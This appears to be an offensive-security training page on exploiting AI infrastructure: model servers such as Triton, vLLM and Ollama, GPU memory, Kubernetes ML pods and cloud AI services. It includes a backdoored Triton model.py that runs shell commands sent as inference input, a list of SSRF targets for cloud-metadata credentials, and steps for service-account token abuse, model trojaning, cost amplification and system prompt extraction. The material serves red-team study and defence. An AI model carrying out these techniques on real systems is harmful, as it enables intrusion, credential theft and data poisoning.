AI Infrastructure Exploitation
Methodology for exploiting GPU clusters, model serving frameworks (Triton, vLLM, Ollama), Kubernetes ML platforms, cloud AI services, and cost amplification attacks.
AI Infrastructure Exploitation
AI infrastructure combines traditional attack surfaces with AI-specific concerns: model serving frameworks with unauthenticated APIs, GPU drivers with kernel-level access, multi-tenant inference platforms with shared memory, and cloud AI services with billing models ripe for cost amplification.
Infrastructure Attack Surfaces
AI infrastructure spans several distinct target categories, each with unique exploitation characteristics.
Model serving frameworks (Triton, vLLM, Ollama) are frequently deployed without authentication, exposing model enumeration, configuration details, and inference endpoints. The highest-severity risk is code execution through custom backends -- Triton's Python backend runs arbitrary code during model load and inference. Unauthenticated management APIs allow loading attacker-controlled models, making any exposed model server a potential foothold into the inference infrastructure.
GPU clusters introduce hardware-level attack surfaces absent from traditional infrastructure. Uninitialized GPU memory can contain data from previous tenants (model weights, training data, API keys). NVLink and NVSwitch fabrics enable peer-to-peer memory access across GPUs if isolation is not enforced. CUDA IPC handles allow cross-process GPU memory access. NVIDIA DCGM management APIs on port 5555 provide cluster-wide GPU control when exposed without authentication.
ML pipelines on Kubernetes commonly over-provision permissions, granting cluster-admin to training job service accounts. Shared storage mounts (/models, /data, /checkpoints) enable lateral movement from a compromised training job to production model replacement or data poisoning. CI/CD systems that automate training and deployment are high-value targets -- compromising the pipeline produces persistent, automated backdoor injection across all future model versions.
GPU Cluster Attacks
Attack Surface Enumeration
From a compromised container, enumerate the GPU infrastructure:
| Component | What to Check | How |
|---|---|---|
| GPU hardware & driver | Model, driver version, compute mode, MIG status | nvidia-smi --query-gpu=name,driver_version,memory.total,compute_mode,mig.mode.current --format=csv |
| CUDA version | Known vulnerabilities in specific versions | nvcc --version |
| DCGM exposure | DCGM management API on port 5555 | TCP connect to localhost:5555 |
| NCCL config | Multi-GPU communication settings | Check NCCL_* environment variables |
| NVLink/NVSwitch | Peer-to-peer GPU memory access, isolation gaps | Check for enabled CUDA IPC handles |
GPU Memory Side Channels
Memory remnants: Allocate uninitialized GPU memory via torch.empty(1024, 1024, device='cuda') and scan for non-zero values. On shared infrastructure, previous tenants' model weights, training data, and API keys may be recoverable.
Timing attacks: Measure allocation latency over many iterations. Bimodal distribution in allocation times indicates co-tenant interference, revealing workload patterns and memory pressure.
NVLink/NVSwitch Risks
| Risk | Description |
|---|---|
| Peer-to-peer memory access | NVLink-connected GPUs can access each other's memory if peer access is enabled |
| NVSwitch fabric | Any-to-any GPU memory access across the fabric |
| CUDA IPC handles | Shared GPU memory between processes via file descriptors; if an attacker obtains the handle, they read/write another process's GPU memory |
Model Serving Vulnerabilities
Reconnaissance Methodology
Identify the serving framework
Probe common endpoints to determine which framework is running.
Framework Health Endpoint Default Port Triton /v2/health/ready8000 (HTTP), 8001 (gRPC) vLLM /health8000 Ollama /api/tags11434 Check for authentication
Most model serving frameworks deploy without authentication by default. Test unauthenticated access to model listing and inference endpoints.
Enumerate models and configurations
Extract model names, architectures, input/output specs, and backend types. Look for Python backends (code execution) and ensemble pipelines.
Test for exploitable features
Check model control APIs (load/unload), metrics endpoints (information disclosure), and custom backend execution.
Framework-Specific Attacks
Triton is the most feature-rich target:
| Endpoint | Risk |
|---|---|
GET /v2/models | Model enumeration without auth |
GET /v2/models/\{name\}/config | Architecture details, backend type, file paths |
POST /v2/repository/index | Full model repository listing |
| Model control API | Load/unload arbitrary models |
Critical risk: Triton's Python backend executes arbitrary code. If you can place a model in the repository, model.py runs during inference:
# model.py in Triton's model repository
class TritonPythonModel:
def initialize(self, args):
os.system('id > /tmp/pwned') # Runs on model load
def execute(self, requests):
# Use inference input as command channel
cmd = pb_utils.get_input_tensor_by_name(
requests[0], 'INPUT').as_numpy()[0].decode()
output = subprocess.getoutput(cmd)vLLM exposes an OpenAI-compatible API, typically without authentication:
| Check | Endpoint | Risk |
|---|---|---|
| Model listing | GET /v1/models | Information disclosure |
| Health/metrics | GET /metrics | GPU count, memory, request patterns, architecture |
| Inference | POST /v1/chat/completions | Compute abuse, system prompt extraction |
Test for system prompt override by sending a system message that contradicts the deployment's intended prompt.
Ollama binds to localhost by default but is often exposed on 0.0.0.0 with no authentication:
| Action | Endpoint | Impact |
|---|---|---|
| List models | GET /api/tags | Enumeration |
| Pull models | POST /api/pull | Bandwidth/storage abuse |
| Create models | POST /api/create | Custom Modelfile execution |
| Delete models | DELETE /api/delete | Denial of service |
| Run inference | POST /api/generate | Compute abuse |
Kubernetes ML Platform Attacks
Privilege Escalation from ML Pods
ML pods commonly have excessive permissions. After compromising a training job, enumerate Kubernetes access:
Read the service account token
Check
/var/run/secrets/kubernetes.io/serviceaccount/token. ML platform service accounts are frequently bound tocluster-admin.Enumerate accessible resources
Test access to cluster-wide secrets, pods, nodes, namespaces, and deployments using the service account token against the Kubernetes API.
Access shared storage
Check common ML mount points for lateral access.
Shared Storage Attack Paths
| Mount Point | Typical Content | Exploitation |
|---|---|---|
/models | Shared model registry | Replace production models with trojaned versions |
/data | Training datasets | Poison training data |
/checkpoints | Training checkpoints | Inject backdoored checkpoints |
/artifacts | MLflow/W&B artifacts | Redirect model deployments |
/home/jovyan | JupyterHub home directories | Access other users' notebooks and credentials |
Cloud AI Service Exploitation
Cloud-Specific Attack Surfaces
| Cloud Service | Entry Points | Escalation Paths |
|---|---|---|
| AWS SageMaker | Notebook instances (Jupyter + IAM role), training jobs (S3/ECR access), endpoints (SSRF) | Enumerate endpoints, models, training jobs; pivot via IAM role |
| GCP Vertex AI | Notebook instances, custom training containers, model endpoints | Service account impersonation, GCS bucket access |
| Azure ML | Compute instances, managed endpoints, datastores | Managed identity abuse, blob storage access |
From a compromised SageMaker notebook, enumerate all endpoints (deployed models), models (with S3 artifact paths), and training jobs (with IAM roles and hyperparameters) via the boto3 SageMaker client.
Cost Amplification Attacks
| Attack Vector | Mechanism | Estimated Hourly Cost |
|---|---|---|
| GPU inference abuse | Max-length requests at max throughput to GPU endpoints | ~$360 (10 req/s x $0.01) |
| Training job spawn | Launch multi-GPU training jobs via compromised credentials | ~$500 per job (10 parallel) |
| Model download abuse | Repeated downloads of large models to trigger egress charges | ~$540 (100GB x 60 downloads x $0.09/GB) |
| Embedding API abuse | Max-size batches to embedding endpoints continuously | Varies by provider |
Inference Service SSRF
Model serving endpoints that accept URLs as input (image classification, web scraping, document processing) are SSRF vectors.
Priority SSRF Targets
| Target | URL | What You Get |
|---|---|---|
| AWS IMDS | http://169.254.169.254/latest/meta-data/iam/security-credentials/ | IAM credentials |
| GCP metadata | http://metadata.google.internal/computeMetadata/v1/ | Service account tokens |
| Azure IMDS | http://169.254.169.254/metadata/identity/oauth2/token | Managed identity tokens |
| Kubernetes API | http://kubernetes.default.svc/api/v1/namespaces | Cluster enumeration |
| Internal Triton | http://triton-server.internal:8000/v2/models | Model enumeration |
| Internal Ollama | http://localhost:11434/api/tags | Local model listing |
You discover an NVIDIA Triton server exposed without authentication. Which finding represents the highest severity risk?
Related Topics
- AI Supply Chain Exploitation -- Supply chain attacks that compromise infrastructure from within
- AI Application Security -- Application-layer vulnerabilities on infrastructure endpoints
- MCP Tool Exploitation -- MCP servers running on exploitable infrastructure
- Advanced Reconnaissance -- Fingerprinting model serving frameworks as recon targets
References
- OWASP Machine Learning Security Top 10 — ML infrastructure risks
- NVIDIA Triton Inference Server — Model serving infrastructure
- Kubernetes Security Best Practices (CISA, 2022) — K8s security for ML clusters